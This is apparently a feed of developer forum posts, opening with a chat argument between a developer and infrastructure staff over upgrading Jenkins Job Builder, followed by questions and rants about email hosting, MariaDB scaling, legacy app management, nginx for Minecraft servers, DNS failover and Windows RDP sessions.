Infra Guy: is this support mandatory to achive whatever you trying to do?
Dev: yes
Infra Guy: u trying to get set of specific folder for set of specific components?
Dev: yes
Infra Guy: bash script with cp or mv will not work for you?
Dev: no
Infra Guy: ?
Dev: when you have already present functionality why reinvent the wheel
Dev: jenkins has support for it
Dev: the jjb is the bottle neck
Infra Guy: getting this functionality onto our infra would have some implications
Dev: why should I write bash script if jenkins allows me to do that
Dev: what implications ??
Infra Guy: will you commit to solve all the issues caused by new jjb?
Dev: you show me the implications first
Infra Guy: like a year ago i have tried to get new jjb <commit_url>
Infra Guy: no, the implications is a grey area
Infra Guy: i cant show all of them and they may hit like in week or eve month
Dev: then why was it not tackled
Dev: and why was it kept like that
Infra Guy: few jobs got broken on something
Dev: it will crop up some time later
Dev: if jobs get broken because of syntax
Dev: then jobs can be fixed
Dev: is it not ???
Infra Guy: ofc
Infra Guy: its just a question who will fix them
Dev: follow the syntax and follow the guidelines
Dev: put up a test server and try and lets see
Dev: you have a dev server
Dev: why not try on that one and see what all jobs fails
Dev: and why they fail
Dev: rather than saying it will fail and who will fix
Dev: let them fail and then lets find why
Dev: I manually define a job
Dev: I get it done
Infra Guy: i dont think we have test server which have the same workload and same attention as our prod
Dev: unless you test how would you know ??
Dev: and just saying that it broke one with a version hence I wont do it
Infra Guy: and im not sure if thats fair for us to deal with implication of upgrading of the major components just cause bash script is not good enough for u
Dev: its pretty bad
Infra Guy: i do agree
Infra TL Guy: Dev, what Infra Guy is saying is that its not possible to upgrade without downtime
Infra Guy: no
Dev: how long a downtime are we looking at ??
Infra Guy: im saying that after this upgrade we will have deal with consequences for long time
Infra Guy-2: No this is not testing the upgrade is the huge effort as we dont have dev resources to handle each job to run
Dev: if your jjb compiles all the yaml without error
Dev: I am not sure what consequences are we talking of
Infra Guy: so you think there will be no consequences, right?
Dev: unless you take the plunge will you know ??
Dev: you have a dev server running at port 9000
Infra Guy: this servers runs nothing
Dev: that is good
Dev: there you can take the risk
Infra Guy: and the fack we have managed to put something onto api doesnt mean it works
Dev: what API ?
Infra Guy: jenkins api
Infra Guy: hmmm
Dev: what have you put on Jenkins API ??
Infra Guy: (
Dev: jjb is a CLI
Infra Guy: ((
Dev: is what I understand
Dev: not a Jenkins API
Infra Guy: (((
Dev: (((((
Infra Guy: jjb build xmls and push them onto api
Infra Guy: and its doent matter
Dev: so you mean to say upgrading a CLI is goig to upgrade your core jenkisn API
Dev: give me a break
Infra Guy: the matter is that even if have managed to build something and put it onto api
Infra Guy: doesnt mean it will work
Dev: the API consumes the xml file and creates a job
Infra Guy: right
Dev: if it confirms to the options which it understands
Dev: then everything will work
Dev: I am actually not getting your point Infra Guy
Infra Guy: i do agree mr Dev
Dev: we are beating around the bush
Infra Guy: just want to be sure that if this upgrade will break something
Infra Guy: we will have a person who will fix it
Dev: that is what CICD is supposed to let me know with valid reasons
Dev: why can't that upgrade be done
Infra Guy: it can be done
Infra Guy: i even have commit in place3 -
I'm trying to improve my email setup once again and need your advice. My idea is as follows:
- 2-5 users
- 1 (sub)domain per user with a catchall
- users need to be able to also send from <any>@<subdomain>.<domain>
- costs up to 1€ per user (without domain)
- provider & server not hosted in five eyes and reasonably privacy friendly
- supports standard protocols (IMAP, SMTP)
- reliable
- does not depend on me to manage it daily/weekly
- Billing/Payment for all accounts/domains at once would be nice-to-have, but not necessary
I registered a domain with wint.global the other day and I actually managed to get this to work, but unfortunately their hosting has been very underwhelming.. the server was unreachable for a few minutes yesterday not only once, but roughly once an hour, and I'd really rather be able to actually receive (and retrieve) my mail. Also their Plesk is quite slow. To be fair for their price it's more like I pay for the domain and get the hosting for free, but I digress..
I am also considering self hosting, but realistically that means running it on a VPS and keeping at secure and patched, which I'd rather outsource to a company who can afford someone to regularly read CVEs and keep things running. I don't really want to worry about maintaining servers when I'm on holiday for example and while an unpatched game server is an acceptable risk, I'd rather keep my email server on good shape.
So in the end the question is: Which provider can fulfill my email dreams?
My research so far:
1. Tutanota doesn't offer standard protocols. I get their reasons but that also makes me depended on their service/software, which I wouldn't like. Multiple domains only on the business plans.
2.With Migadu I could easily hit their limits of incoming mails if someone signs up for too many newsletters and I can't (and don't want to) micromanage that.
3. Strato: Unclear whether I can create mails for subdomains. Also I don't like the company for multiple reasons. However I can access a domains hosted there and could try...
4. united-domains: Unclear whether I can create mails for subdomains.
5. posteo: No custom domains allowed.
I'm getting tired.. *sigh*21 -
PHP dev help/advice needed!
We have problems with mysql. Still stuck with mariaDB, I'm using indexes (correct ones) and we have problems with scaling. we have a few tables with over 100mil rows, 1 of them is being read every morning with a subselect that counts unique rows, and fails every time because of timeout/lock, the temp table size was increased and helped for a little while but as time goes on the table grows and the problem reappears. I'm reading from a slave server that was purposely created for read only, yet we still have problems. We're using managed dedicated servers for out hosting and they aren't willing to optimise the database configs for our needs. What are the easiest options for scaling at this point? Going fully dedicated server and perconaDB? NOsql? Sharding the server? Anyone got any good blogposts or something to read about this? your own experience?11 -
Oh let the rant time begin…
So previous post I mentioned about this dev who has resigned and how I was going to see about a Snr. position.
Management is now scrambling to figure out what to do as this dev managed all the migration to AWS etc, I know servers but haven’t got too much familiarity with AWS.
Anyways so I finally get a 1:1 with my new line manager. I ask about the position and he says they don’t know what there going to do yet. Hire a new dev in India to offset and with the same knowledge even though the guy leaving is in the U.K. Bad idea as the servers are in the U.K. so if we get downtime or the server crashes we have no one in the U.K. to reset or access to the servers. India are very cagey who gets access which is annoying to say the least even though us (three devs) in the U.K. are the principal engineering team so there looking at all options.
Anyways we have a back and fourth, we discuss some of the plans for the app, some of which we are nowhere near ready to even conceptualise as the app in its current state sucks, (ruby 2.2.6 and rails 5 but not really). Needs major refactoring and rewrite, one thing they want to do is multi tendency which again given the state is laughable.
So, as my manager is speaking my head is screaming being like “this is just going to be a massive disaster”. Then we go onto that he’s seeing what everyone’s strengths are etc. And then we get onto the upgrade and that he wants me to work on it.
Yes.. the upgrade I’ve been trying to do for the past 4+ months but I keep getting told to stop and getting pushed backed.
I’ve been told we have devOps looking into restructuring the app, not possible as how the app is written, we have India trying to multi tenant again disaster incoming as they’ll end up rushing it. Legal are going to have a field day. Every time I say the issues are the fundamentals with the app, here’s how we can sort it. In one ear out the other basically there patching the ship even though it’s still leaking.
I have so many ideas, and things I can do to improve the app and get it back to not only working order, fix the performance issues, data issues and everything else. Brick wall.
So rants ensue where I basically say I would love to do the upgrade but management gives me no time in the roadmap (we have no say in planning). At this point I’m just speaking to a brick wall.
After the meeting I have a chat with the BAs, we all have the same issues so honestly it sucks we end up ranting to each other for an hour.
I’m being under-utilised, being told do this, do that even though I’ve had two stabs but told to stop and pushed back, I know what benefits I can bring to the app with a refactoring, ideas and how to properly lead the team because honestly we’re working on an old legacy app, and management are clueless and there priorities are all wrong, the company is getting frustrated and it’s a sinking ship. They would rather patch issues without solving them and everything I say goes in one ear and out the other.
Frustrating is not the word.1 -
Managed to free up a shit load of disk space on our application servers, just by cleaning out old and unnecessary backup archives and obsolete versions of WPF application files. I think I made the guys at infrastructure a favour today *feeling a bit smug now*
-
Most of the web stuff I have done in the past have been PHP, Wordpress, cgi, etc. I read about nginx and was very impressed by what it accomplished in the last 20 years. Now I have a desire to play with this tech for fun.
What I want to do:
- create, manage, and launch minecraft servers
- provide a web interface for managing servers (I would like to learn how to make the server use the infrastructure of nginx to be managed like its other services)
- make this packaged so others can use this (probably on github)
I don't know anything about nginx other than it is really really cool, can serve massive amounts of web pages, and can do a whole lot more than that.
Question:
Is nginx suitable for this? Is this a big learning curve? Will I have fun doing this?
I am currently running a multi-instance minecraft server being managed by a piece of software called Crafty Controller. It is really neat. However, I am finding it buggy. I also see that the next version of this software will be behind a patreon. This is really disappointing. So this is spurring me to consider building something fun for myself, and if useful, for others.
I will most likely do very barebones and inflexible web interface that just gets the job done. I know enough to get by. So I assume I have a large learning curve ahead to do this.
Any advice? Is this going to turn into a large time sink?2 -
This might be a weird one or something that you're not supposed to do
I have a domain which I bought because it was very cheap, I have an old pc which I use as a server and I have to servers on the Oracle Cloud free tier
Now the actual question
Without shelling for a managed dns (which would be more per month than I'm paying for the domain per year), is there a way that I can self-host from my server and then use the Oracle Cloud servers as fallback/failover?
All 3 machines are Ubuntu 18.04 using Apache HTTPD, if that helps2 -
Windows RDP, multiple sessions per user are turned on..
I always fall into one of existing sessions with all the crap left opened by my coworkers.. I'm fuckin sick of this shit, noone closes things after they stop using servers.. // the rant part
Is there a way to force new session on connect? // the question part
I tried googling but either I'm blind or don't know what to google.. only managed to find how to connect to specific existing session.. :/6